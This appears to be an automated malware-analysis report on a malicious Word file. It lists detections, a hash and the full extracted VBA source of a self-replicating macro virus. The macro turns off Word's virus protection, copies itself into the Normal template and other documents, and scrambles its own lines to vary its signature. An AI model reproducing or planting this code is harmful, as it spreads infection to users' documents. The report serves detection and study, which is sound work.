Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document with a high confidence verdict of malicious, primarily due to the presence of VBA macros. The 'Document_Close' subroutine within the macros is designed to export its own code to 'c:\macros.bas' and then attempt to add it back into the document, suggesting an attempt to obfuscate or modify its behavior. This pattern is commonly used by macro-based malware to download and execute further malicious content.
Heuristics (2)
- ClamAV: Doc.Trojan.Class-34 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Class-34
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2158 bytes |

SHA-256: 04faae4fd28857def8512447638eb36047b6b1f8e443ae6cda3061cafea9ec87
Detection (ClamAV): Doc.Trojan.Class-34
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Close()
PLM = GGR + AQR
On Error Resume Next
PAJ = SRI + VTB
Options.ConfirmConversions = 0
UIL = QBN + KGN
Application.EnableCancelKey = 0
OFG = SSM + VUE
VB39 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
PVF = LCV + OAM
SG69 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CCR = GBG + IGU
Options.SaveNormalPrompt = 0
VIG = DDO + JJP
Options.VirusProtection = 0
HNE = EMB + KTF
If SG69 > 0 And VB39 > 0 Then GoTo GV13
RIG = UNN + JCM
If SG69 = 0 Then
PUS = ALU + JOL
Set DQ55 = ActiveDocument.VBProject.VBComponents.Item(1)
LKH = IFB + FVB
UV96 = True
IIK = DKF + NLD
End If
UOL = ICR + KQN
If VB39 = 0 Then
SAE = BCH + CAL
Set DQ55 = NormalTemplate.VBProject.VBComponents.Item(1)
OLS = BEO + JHD
IR69 = True
PUL = BQI + KKE
End If
HCM = DUC + JGT
If IR69 = True Then
QGO = FBA + HRG
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\" & Application.UserInitials
FKF = HAK + ETM
DQ55.CodeModule.AddFromFile ("c:\" & Application.UserInitials)
QUH = LBN + JVC
DQ55.CodeModule.deletelines 1, 4
UNH = DKE + VCA
DQ55.CodeModule.replaceline 1, "Sub Document_Close()"
HMU = LIS + SOP
ElseIf UV96 = True Then
VHK = JPD + JLR
DQ55.CodeModule.AddFromFile ("c:\" & Application.UserInitials)
LJL = FNK + OTI
DQ55.CodeModule.deletelines 1, 4
GGD = LEM + HTK
End If
EPQ = NRD + REV
With DQ55.CodeModule
BBR = IKC + CDB
For x = 2 To (DQ55.CodeModule.CountOfLines - 1) Step 2
PLM = EKQ + QIT
.replaceline x, (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " = " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " + " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22)))
QBN = PAJ + IGV
Next x
RPJ = QGH + JUC
End With
OHC = EBJ + VLK
GV13:
VEI = IGL + DLV
End Sub
```